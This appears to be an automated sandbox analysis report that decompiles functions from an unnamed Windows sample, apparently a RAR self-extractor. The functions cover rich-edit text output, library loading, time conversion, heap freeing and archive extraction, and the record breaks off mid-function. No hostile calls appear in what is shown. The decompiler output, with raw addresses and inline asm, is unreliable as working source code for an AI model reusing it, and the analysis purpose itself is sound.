Instruction ID: 5e0c369aa421e7914a6a75044273f9a0a829656699b572651c7411d7ebf581e1
Opcode Fuzzy Hash: 07c939b3e0de819aef1e3ff051874ba9b5d8955eaed63074634a2a3568144a6a
Instruction Fuzzy Hash: 85712971A00219AFDF10DFA8CC89AEEBBB9FF08314F048129F915E6190C774AA55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040CFBD, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CFBD(char _a4, long _a8) {
				struct HWND__* _v8;
				char _v75;
				intOrPtr _v80;
				signed int _v92;
				int _v96;
				void* _v100;
				intOrPtr _t48;
				struct HWND__* _t49;

				_t49 = GetDlgItem( *0x440cf8, 0x68);
				_v8 = _t49;
				if( *0x440cfc == 0) {
					_t48 =  *0x437ccc; // 0x0
					E00418CA4(_t48);
					ShowWindow(_t49, 5); // executed
					SendMessageW(_t49, 0xb1, 0, 0xffffffff);
					SendMessageW(_t49, 0xc2, 0, 0x42a53c);
					 *0x440cfc = 1;
				}
				SendMessageW(_v8, 0xb1, 0x5f5e100, 0x5f5e100);
				_v100 = 0x5c;
				SendMessageW(_v8, 0x43a, 0,  &_v100);
				_v75 = 0;
				_v96 = 1;
				if(_a4 != 0) {
					_v92 = _v92 & 0xbfffffff | 1;
					_v80 = 0xa0;
					_v96 = 0x40000001;
				}
				SendMessageW(_v8, 0x444, 1,  &_v100);
				SendMessageW(_v8, 0xc2, 0, _a8);
				SendMessageW(_v8, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_a4 != 0) {
					_v92 = _v92 & 0xfffffffe | 0x40000000;
					SendMessageW(_v8, 0x444, 1,  &_v100);
				}
				return SendMessageW(_v8, 0xc2, 0, L"\r\n");
			}

0x0040cfe1
0x0040cfe3
0x0040cfeb
0x0040cfed
0x0040cff3
0x0040cffb
0x0040d007
0x0040d016
0x0040d018
0x0040d018
0x0040d02a
0x0040d03a
0x0040d041
0x0040d04a
0x0040d04e
0x0040d051
0x0040d05e
0x0040d061
0x0040d068
0x0040d068
0x0040d07c
0x0040d08b
0x0040d093
0x0040d099
0x0040d0a6
0x0040d0b7
0x0040d0b7
0x0040d0ce

APIs

GetDlgItem.USER32 ref: 0040CFCE
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040D10B,00000001,?,?,0040DFB3,0042A810,0044C3F0,0044C3F0,00001000), ref: 0040CFFB
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0040D007
SendMessageW.USER32(00000000,000000C2,00000000,0042A53C), ref: 0040D016
SendMessageW.USER32(00401302,000000B1,05F5E100,05F5E100), ref: 0040D02A
SendMessageW.USER32(00401302,0000043A,00000000,?), ref: 0040D041
SendMessageW.USER32(00401302,00000444,00000001,0000005C), ref: 0040D07C
SendMessageW.USER32(00401302,000000C2,00000000,00000456), ref: 0040D08B
SendMessageW.USER32(00401302,000000B1,05F5E100,05F5E100), ref: 0040D093
SendMessageW.USER32(00401302,00000444,00000001,0000005C), ref: 0040D0B7
SendMessageW.USER32(00401302,000000C2,00000000,0042A7D8), ref: 0040D0C8

Part of subcall function 00418CA4: DestroyWindow.USER32(?,745DBB20,0040CFF8,?,?,?,?,?,0040D10B,00000001,?,?,0040DFB3,0042A810,0044C3F0,0044C3F0), ref: 00418CAF

Strings

\, xrefs: 0040D03A

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$DestroyItemShow
String ID: \
API String ID: 2996232536-2967466578
Opcode ID: 2879b6f67be9803266b55727c2c252168796b94086ec10324e9573bbc8a08ed3
Instruction ID: b6294efb118d648a5d28a0c61ec89d1eb2e10a2b31d3368e6597a70cb6cc8862
Opcode Fuzzy Hash: 2879b6f67be9803266b55727c2c252168796b94086ec10324e9573bbc8a08ed3
Instruction Fuzzy Hash: BB31CD70E4024CBAEB219BA0DC4AFAE7F79EB41714F10412AB605AA1E0C7B50D50DF65

Uniqueness

Uniqueness Score: -1.00%

Function 00419958, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 30
librarycomCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00419958(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HINSTANCE__* _t7;
				struct HINSTANCE__* _t8;
				void* _t12;
				void* _t15;
				struct HINSTANCE__** _t16;

				_t16 = __ecx;
				__ecx[1] = __ecx[1] & 0x00000000;
				 *__ecx =  *__ecx & 0x00000000;
				_t7 = LoadLibraryW(L"riched32.dll"); // executed
				 *_t16 = _t7;
				_t8 = LoadLibraryW(L"riched20.dll");
				_t16[1] = _t8;
				__imp__OleInitialize(0, _t12, _t15, __ecx, __ecx);
				_v12 = 8;
				_v8 = 0x7ff;
				__imp__InitCommonControlsEx( &_v12);
				__imp__SHGetMalloc(0x44ecb8); // executed
				return _t16;
			}

0x00419965
0x00419967
0x0041996b
0x00419973
0x0041997a
0x0041997c
0x00419980
0x00419983
0x0041998d
0x00419994
0x0041999b
0x004199a6
0x004199b1

APIs

LoadLibraryW.KERNELBASE(riched32.dll,00000000,00438CD8,?,?,?,0040FC50), ref: 00419973
LoadLibraryW.KERNEL32(riched20.dll,?,0040FC50), ref: 0041997C
OleInitialize.OLE32(00000000), ref: 00419983
InitCommonControlsEx.COMCTL32(?), ref: 0041999B
SHGetMalloc.SHELL32(0044ECB8), ref: 004199A6

Strings

riched20.dll, xrefs: 00419975
riched32.dll, xrefs: 0041996E

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$CommonControlsInitInitializeMalloc
String ID: riched20.dll$riched32.dll
API String ID: 448729520-3294723617
Opcode ID: 57b956e57c91923ab1c8b1a3b979deac9b605d66debfebdd3108ff23c8382ad5
Instruction ID: 38482be14601c6dad11296fa9821733d2249619caa1032b0f08b1176fe285c03
Opcode Fuzzy Hash: 57b956e57c91923ab1c8b1a3b979deac9b605d66debfebdd3108ff23c8382ad5
Instruction Fuzzy Hash: 84F0E271700304EFD7205F95DC0DB8ABBF8EF80725F50402EE84093190D7F8A4048BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00410FA1, Relevance: 9.1, APIs: 6, Instructions: 125
timeCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00410FA1(long* __ecx, void* __eflags, signed int* _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				void* _v24;
				struct _FILETIME _v28;
				void* _v32;
				struct _FILETIME _v36;
				struct _SYSTEMTIME _v52;
				struct _SYSTEMTIME _v68;
				struct _SYSTEMTIME _v84;
				void* _t68;
				signed int _t78;
				void* _t81;
				signed int _t107;
				long _t109;
				signed int* _t120;

				_v20.dwLowDateTime =  *__ecx;
				_v20.dwHighDateTime = __ecx[1];
				FileTimeToSystemTime( &_v20,  &_v68);
				SystemTimeToTzSpecificLocalTime(0,  &_v68,  &_v84); // executed
				SystemTimeToFileTime( &_v84,  &_v12);
				SystemTimeToFileTime( &_v68,  &_v28);
				_t109 = _v20.dwHighDateTime;
				asm("adc ecx, ebx");
				_t68 = E0041A4C0(_v12.dwHighDateTime + _t109, 0, 0, 1);
				asm("sbb edx, ebx");
				asm("sbb edx, ebx");
				asm("adc edx, ebx");
				asm("adc edx, ebx");
				_v12.dwLowDateTime = _t68 - _v28.dwLowDateTime + _v12.dwLowDateTime + _v20.dwLowDateTime;
				_v12.dwHighDateTime = _t109;
				FileTimeToSystemTime( &_v12,  &_v52);
				_t120 = _a4;
				_t78 = _v52.wDay & 0x0000ffff;
				_t110 = _v52.wYear & 0x0000ffff;
				_t107 = _v52.wMonth & 0x0000ffff;
				_t120[3] = _v52.wHour & 0x0000ffff;
				_t120[4] = _v52.wMinute & 0x0000ffff;
				_t120[5] = _v52.wSecond & 0x0000ffff;
				_t120[2] = _t78;
				 *_t120 = _v52.wYear & 0x0000ffff;
				_t120[1] = _t107;
				_t120[7] = _v52.wDayOfWeek & 0x0000ffff;
				_t120[8] = _t78 - 1;
				_t81 = 1;
				if(_t107 > 1) {
					_a4 = 0x42f130;
					while(_t81 <= 0xc) {
						_t120[8] = _t120[8] +  *_a4;
						_a4 =  &(_a4[1]);
						_t81 = _t81 + 1;
						if(_t81 < _t107) {
							continue;
						}
						goto L4;
					}
				}
				L4:
				if(_t107 > 2 && E00410F72(_t110) != 0) {
					_t120[8] = _t120[8] + 1;
				}
				_v52.wMilliseconds = 0;
				SystemTimeToFileTime( &_v52,  &_v36);
				_t120[6] = 0 - _v36.dwLowDateTime + _v12.dwLowDateTime;
				return _v12.dwHighDateTime;
			}

0x00410fb4
0x00410fc0
0x00410fc3
0x00410fcf
0x00410fe3
0x00410fed
0x00410fef
0x00410ffe
0x00411002
0x00411011
0x0041101a
0x00411021
0x00411025
0x00411027
0x00411037
0x0041103a
0x0041103c
0x00411043
0x00411047
0x0041104b
0x0041104f
0x00411056
0x0041105d
0x00411064
0x00411068
0x0041106a
0x0041106d
0x00411070
0x00411075
0x00411078
0x0041107a
0x00411081
0x0041108b
0x0041108e
0x00411092
0x00411095
0x00000000
0x00000000
0x00000000
0x00411095
0x00411081
0x00411097
0x0041109a
0x004110a6
0x004110a6
0x004110ab
0x004110b7
0x004110cc
0x004110d2

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,00000054), ref: 00410FC3
SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00410FCF
SystemTimeToFileTime.KERNEL32(?,?), ref: 00410FE3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00410FED
FileTimeToSystemTime.KERNEL32(?,?,?,00000000,00000000,00000001), ref: 0041103A
SystemTimeToFileTime.KERNEL32(?,?), ref: 004110B7

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$System$File$LocalSpecific
String ID:
API String ID: 979780441-0
Opcode ID: 8d583991f62f7071cd4d57e6d44c5f6a855167b86e33da42a062be56bfef7e7e
Instruction ID: 17c201e2f67ca1222e538c878e325ab67de561c9ab9ddf2699a9d4224310d7d0
Opcode Fuzzy Hash: 8d583991f62f7071cd4d57e6d44c5f6a855167b86e33da42a062be56bfef7e7e
Instruction Fuzzy Hash: 8B410BB5E002189FCB14DFA9C8849EEBBF9FF4C310B14852FE946E7244D634A985CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004110D5, Relevance: 7.6, APIs: 5, Instructions: 93
timeCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004110D5(signed int* __ecx, intOrPtr* _a4) {
				struct _FILETIME _v12;
				void* _v16;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				struct _SYSTEMTIME _v44;
				struct _SYSTEMTIME _v60;
				struct _SYSTEMTIME _v76;
				int _t48;
				void* _t62;
				signed int _t66;
				signed int* _t67;
				signed int _t76;
				intOrPtr* _t78;
				intOrPtr _t79;

				_t78 = _a4;
				_v44.wYear =  *_t78;
				_t3 = _t78 + 4; // 0xffec8b55
				_v44.wMonth =  *_t3;
				_t5 = _t78 + 8; // 0x75ff1c75
				_v44.wDay =  *_t5;
				_t7 = _t78 + 0xc; // 0x1475ff18
				_v44.wHour =  *_t7;
				_t9 = _t78 + 0x10; // 0xff1075ff
				_v44.wMinute =  *_t9;
				_t11 = _t78 + 0x14; // 0x75ff0c75
				_v44.wSecond =  *_t11;
				_v44.wMilliseconds = 0;
				_t67 = __ecx;
				_t48 = SystemTimeToFileTime( &_v44,  &_v12);
				if(_t48 == 0) {
					 *_t67 =  *_t67 & 0x00000000;
					_t67[1] = _t67[1] & 0x00000000;
					return _t48;
				}
				_t16 = _t78 + 0x18; // 0xd1c3e808
				_t79 =  *_t16;
				_v12.dwLowDateTime = _v12.dwLowDateTime + _t79;
				if(_v12.dwLowDateTime < _t79) {
					_v12.dwHighDateTime = _v12.dwHighDateTime + 1;
				}
				FileTimeToSystemTime( &_v12,  &_v60);
				__imp__TzSpecificLocalTimeToSystemTime(0,  &_v60,  &_v76); // executed
				SystemTimeToFileTime( &_v76,  &_v28);
				SystemTimeToFileTime( &_v60,  &_v20);
				_t76 = _v12.dwHighDateTime;
				asm("adc ecx, esi");
				_t62 = E0041A4C0(_v28.dwHighDateTime + _t76, 0, 0, 1);
				asm("sbb edx, esi");
				asm("sbb edx, esi");
				asm("adc edx, esi");
				_t66 = _t62 - _v20.dwLowDateTime + _v28.dwLowDateTime + _v12.dwLowDateTime;
				asm("adc edx, esi");
				 *_t67 = _t66;
				_t67[1] = _t76;
				return _t66;
			}

0x004110dd
0x004110e3
0x004110e7
0x004110eb
0x004110ef
0x004110f3
0x004110f7
0x004110fb
0x004110ff
0x00411103
0x00411107
0x0041110b
0x00411118
0x00411124
0x00411126
0x0041112a
0x004111b4
0x004111b7
0x00000000
0x004111b7
0x00411130
0x00411130
0x00411133
0x00411139
0x0041113b
0x0041113b
0x00411146
0x00411156
0x00411164
0x0041116e
0x00411170
0x0041117f
0x00411183
0x00411192
0x0041119b
0x004111a2
0x004111a4
0x004111a6
0x004111ad
0x004111af
0x00000000

APIs

SystemTimeToFileTime.KERNEL32(?,00411219,00000034,00000054), ref: 00411126
FileTimeToSystemTime.KERNEL32(00411219,?), ref: 00411146
TzSpecificLocalTimeToSystemTime.KERNELBASE(00000000,?,?), ref: 00411156
SystemTimeToFileTime.KERNEL32(?,?), ref: 00411164
SystemTimeToFileTime.KERNEL32(?,?), ref: 0041116E

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$System$File$LocalSpecific
String ID:
API String ID: 979780441-0
Opcode ID: 68a02b4a282db07ac670fb6f5fc7938166be5d672e29d814951ce0bbc23ea76e
Instruction ID: f1c70c5c95a1f1e0140dd18566a3572003774940c388339f80afd4647a701745
Opcode Fuzzy Hash: 68a02b4a282db07ac670fb6f5fc7938166be5d672e29d814951ce0bbc23ea76e
Instruction Fuzzy Hash: 0531407AA0021DABCF14DFE4C844AEFF7B8EF48710F04452AE945E3200E630A945CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00419DFE, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00419DFE(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x42d618);
				_t8 = E0041F49C(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E0041F4E1(_t8);
				}
				if( *0x4508f4 != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x44ed00); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E0041E7AE(_t31);
						 *_t10 = E0041E76C(GetLastError());
					}
					goto L9;
				}
				E0041E9A3(__ebx, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E0041E9D6(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E0041EA06();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E00419E54();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x00419dfe
0x00419e00
0x00419e05
0x00419e0a
0x00419e0f
0x00419e86
0x00419e8b
0x00419e8b
0x00419e18
0x00419e5d
0x00419e5e
0x00419e5e
0x00419e66
0x00419e6c
0x00419e6e
0x00419e70
0x00419e83
0x00419e85
0x00000000
0x00419e6e
0x00419e1c
0x00419e22
0x00419e27
0x00419e2d
0x00419e32
0x00419e34
0x00419e35
0x00419e36
0x00419e3c
0x00419e3d
0x00419e44
0x00419e4d
0x00000000
0x00419e4f
0x00419e4f
0x00000000
0x00419e4f

APIs

__lock.LIBCMT ref: 00419E1C

Part of subcall function 0041E9A3: __mtinitlocknum.LIBCMT ref: 0041E9B9
Part of subcall function 0041E9A3: __amsg_exit.LIBCMT ref: 0041E9C5
Part of subcall function 0041E9A3: EnterCriticalSection.KERNEL32(0041A29B,0041A29B,?,00424CE6,00000004,0042DA90,0000000C,0042092E,00000000,0041A2AA,00000000,00000000,00000000,?,0041E366,00000001), ref: 0041E9CD

___sbh_find_block.LIBCMT ref: 00419E27
___sbh_free_block.LIBCMT ref: 00419E36
RtlFreeHeap.NTDLL(00000000,00000000,0042D618,0000000C,0041E984,00000000,0042D8F0,0000000C,0041E9BE,00000000,0041A29B,?,00424CE6,00000004,0042DA90,0000000C), ref: 00419E66
GetLastError.KERNEL32(?,00424CE6,00000004,0042DA90,0000000C,0042092E,00000000,0041A2AA,00000000,00000000,00000000,?,0041E366,00000001,00000214), ref: 00419E77

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: c066cd9581aa134ccb5927a592524b4ff3e4f88f23bedc9a293544e4893e8727
Instruction ID: 99907fc3b549298e008dbb6493ac9abc8d35753d6e8f02040e121beb07a6238a
Opcode Fuzzy Hash: c066cd9581aa134ccb5927a592524b4ff3e4f88f23bedc9a293544e4893e8727
Instruction Fuzzy Hash: 96012175A41311A6EB30ABA2D919BDF3764AF40B68F10042BF914562C1CA3D89C18A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00410CE2, Relevance: 7.5, APIs: 5, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410CE2(void* __ecx) {
				long* _t16;
				void** _t19;
				void* _t21;

				_t17 = __ecx;
				_t21 = __ecx;
				E00410C36(__ecx);
				_t16 = 0;
				 *((char*)(__ecx + 0x194)) = 1;
				ReleaseSemaphore( *(__ecx + 0x198), 0x20, 0);
				if( *((intOrPtr*)(_t21 + 0x84)) > 0) {
					_t4 = _t21 + 4; // 0x225123c
					_t19 = _t4;
					do {
						E00410AAB(_t17,  *_t19);
						CloseHandle( *_t19);
						_t16 = _t16 + 1;
						_t19 =  &(_t19[1]);
					} while (_t16 <  *((intOrPtr*)(_t21 + 0x84)));
				}
				_t6 = _t21 + 0x1a0; // 0x22513d8
				DeleteCriticalSection(_t6);
				FindCloseChangeNotification( *(_t21 + 0x198)); // executed
				return CloseHandle( *(_t21 + 0x19c));
			}

0x00410ce2
0x00410ce5
0x00410ce7
0x00410cec
0x00410cf7
0x00410cfe
0x00410d10
0x00410d13
0x00410d13
0x00410d16
0x00410d18
0x00410d1f
0x00410d21
0x00410d22
0x00410d25
0x00410d2d
0x00410d2e
0x00410d35
0x00410d41
0x00410d4e

APIs

Part of subcall function 00410C36: ResetEvent.KERNEL32(?,00000200,?,?,00404FB6), ref: 00410C5C
Part of subcall function 00410C36: ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 00410C6C

ReleaseSemaphore.KERNEL32 ref: 00410CFE
CloseHandle.KERNEL32(0225123C,0225123C,0044EA50), ref: 00410D1F
DeleteCriticalSection.KERNEL32(022513D8), ref: 00410D35
FindCloseChangeNotification.KERNELBASE(?), ref: 00410D41
CloseHandle.KERNEL32(?), ref: 00410D49

Part of subcall function 00410AAB: WaitForSingleObject.KERNEL32(?,000000FF,00410C79,?), ref: 00410AB1
Part of subcall function 00410AAB: GetLastError.KERNEL32(?), ref: 00410ABD

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$HandleReleaseSemaphore$ChangeCriticalDeleteErrorEventFindLastNotificationObjectResetSectionSingleWait
String ID:
API String ID: 565839277-0
Opcode ID: 7bf8e0862443a8a1a918faf336b16a85e74607ea489babd515d57d088eabd713
Instruction ID: 253fc8d0232d5a1bc7900341ecf319c9a26f782fa179b70022d5a51f7ff7ed5a
Opcode Fuzzy Hash: 7bf8e0862443a8a1a918faf336b16a85e74607ea489babd515d57d088eabd713
Instruction Fuzzy Hash: 59F096751017089FD7316B70ED45AD7B7A5EF0A354F10482AEA9A42121CB7778A1DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00407F3E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00407F3E(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t50;
				signed int _t53;
				signed int _t54;
				void* _t56;
				signed int _t58;
				signed int _t63;
				signed int _t77;
				void* _t82;
				signed int _t85;
				void* _t97;
				void* _t101;
				void* _t103;
				void* _t106;

				_t106 = __eflags;
				_t96 = __edx;
				E00419DD4(E00429243, _t103);
				E0041A3E0(0xd2d4);
				_t101 = __ecx;
				_push(_t97);
				_push( *((intOrPtr*)(__ecx + 8)));
				E0040185E(_t103 - 0xd2e0, __edx, _t97, _t106);
				_t98 = __ecx + 0x3af4;
				_t77 = 0;
				 *(_t103 - 4) = 0;
				_t47 = E004086AB(_t103 - 0xd2e0, __ecx + 0x3af4);
				_t82 = _t103 - 0xd2e0;
				if(_t47 == 0) {
					L18:
					 *(_t103 - 4) =  *(_t103 - 4) | 0xffffffff;
					E00401235(_t82, _t98);
					 *[fs:0x0] =  *((intOrPtr*)(_t103 - 0xc));
					return 0;
				}
				_push(1); // executed
				_t50 = E0040146C(_t82, __edx); // executed
				if(_t50 != 0) {
					__eflags =  *(_t103 - 0x309b);
					if( *(_t103 - 0x309b) != 0) {
						L17:
						_t82 = _t103 - 0xd2e0;
						goto L18;
					}
					 *((intOrPtr*)(_t103 - 0x14)) = 0;
					__eflags =  *(_t103 - 0x30ab);
					if(__eflags == 0) {
						L10:
						E00406E66(_t101, _t96, _t98, _t101, _t103, __eflags, _t103 - 0xd2e0);
						_t53 =  *(_t101 + 8);
						_t85 =  *(_t53 + 0x72b2) & 0x0000ffff;
						__eflags = _t85 - 0x54;
						if(_t85 == 0x54) {
							L12:
							 *((char*)(_t53 + 0x51c1)) = 1;
							L13:
							_t54 =  *(_t101 + 8);
							__eflags =  *((short*)(_t54 + 0x72b2)) - 0x49;
							if( *((short*)(_t54 + 0x72b2)) != 0x49) {
								__eflags =  *((char*)(_t54 + 0x51c1));
								_t33 =  *((char*)(_t54 + 0x51c1)) == 0;
								__eflags =  *((char*)(_t54 + 0x51c1)) == 0;
								_t54 = E0041123B((_t54 & 0xffffff00 | _t33) & 0x000000ff, (_t54 & 0xffffff00 | _t33) & 0x000000ff, _t101 + 0x3af4);
							}
							E00422FB3(_t54);
							do {
								_t56 = E0040363F(_t96, _t103);
								_push(_t103 - 0xd);
								_push(_t56);
								_push(_t103 - 0xd2e0);
								_t58 = L00407428(_t101, _t96); // executed
								__eflags = _t58;
							} while (_t58 != 0);
							goto L17;
						}
						__eflags = _t85 - 0x49;
						if(_t85 != 0x49) {
							goto L13;
						}
						goto L12;
					}
					_t63 = E0041A0EF(_t103 - 0x1018, _t103 - 0xd2c2);
					__eflags =  *(_t103 - 0x30a6);
					_t98 = 0x800;
					while(1) {
						E0040A394(_t103 - 0x1018, _t98, (_t63 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
						E004065D5(_t103 - 0x2060);
						_push(0);
						__eflags = E00409429(_t96, _t103 - 0x1018, _t103 - 0x2060);
						if(__eflags == 0) {
							break;
						}
						_t77 = _t77 +  *((intOrPtr*)(_t103 - 0x1060));
						_t63 =  *(_t103 - 0x105c);
						asm("adc [ebp-0x14], eax");
						__eflags =  *(_t103 - 0x30a6);
					}
					 *((intOrPtr*)(_t101 + 0x18a8)) =  *((intOrPtr*)(_t101 + 0x18a8)) + _t77;
					asm("adc [eax+0x4], ecx");
					goto L10;
				}
				if(E0040A27B(_t98, L"rar") != 0) {
					E00406222(0x432a6c, 1);
				}
				goto L17;
			}

0x00407f3e
0x00407f3e
0x00407f43
0x00407f4d
0x00407f54
0x00407f56
0x00407f57
0x00407f60
0x00407f65
0x00407f6b
0x00407f74
0x00407f77
0x00407f7c
0x00407f84
0x004080d9
0x004080d9
0x004080dd
0x004080ea
0x004080f2
0x004080f2
0x00407f8a
0x00407f8c
0x00407f93
0x00407fb9
0x00407fbf
0x004080d3
0x004080d3
0x00000000
0x004080d3
0x00407fc5
0x00407fc8
0x00407fce
0x00408054
0x0040805d
0x00408062
0x00408065
0x0040806c
0x00408070
0x00408078
0x00408078
0x0040807f
0x0040807f
0x00408082
0x0040808a
0x0040808c
0x00408099
0x00408099
0x004080a1
0x004080a1
0x004080ac
0x004080b1
0x004080b7
0x004080bf
0x004080c0
0x004080c7
0x004080ca
0x004080cf
0x004080cf
0x00000000
0x004080b1
0x00408072
0x00408076
0x00000000
0x00000000
0x00000000
0x00408076
0x00407fe2
0x00407fe7
0x00407fef
0x0040800e
0x0040801d
0x00408028
0x0040802d
0x00408042
0x00408044
0x00000000
0x00000000
0x00407ffc
0x00407ffe
0x00408004
0x00408007
0x00408007
0x0040804f
0x00408051
0x00000000
0x00408051
0x00407fa2
0x00407faf
0x00407faf
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00407F43

Part of subcall function 0040185E: __EH_prolog.LIBCMT ref: 00401863
Part of subcall function 0040185E: _memset.LIBCMT ref: 004019A6
Part of subcall function 0040185E: _memset.LIBCMT ref: 004019B5
Part of subcall function 0040185E: _memset.LIBCMT ref: 004019C4

Part of subcall function 0040146C: __EH_prolog.LIBCMT ref: 00401471

_wcscpy.LIBCMT ref: 00407FE2

Strings

l*C, xrefs: 00407FAA
rar, xrefs: 00407F95

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog_memset$_wcscpy
String ID: l*C$rar
API String ID: 2876264062-3537253255
Opcode ID: 56c96356e9b92cd4e2e4f1637a99b0a3726372864d070d809d05aca9448b70e3
Instruction ID: 5c8f02c89ad5144374888ffb9dcf715037026457c99b53aef3c527b8de228ad6
Opcode Fuzzy Hash: 56c96356e9b92cd4e2e4f1637a99b0a3726372864d070d809d05aca9448b70e3
Instruction Fuzzy Hash: 6E41A5319042599EDB24EB50DA45AEB77B8AF14304F4400FFE449B31C2DB795F89CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00412222, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00412222(void* __ecx, unsigned int _a4, char _a8, char _a11) {
				signed int _v8;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t37;
				signed int _t39;
				intOrPtr _t41;
				signed int _t44;
				signed int _t50;
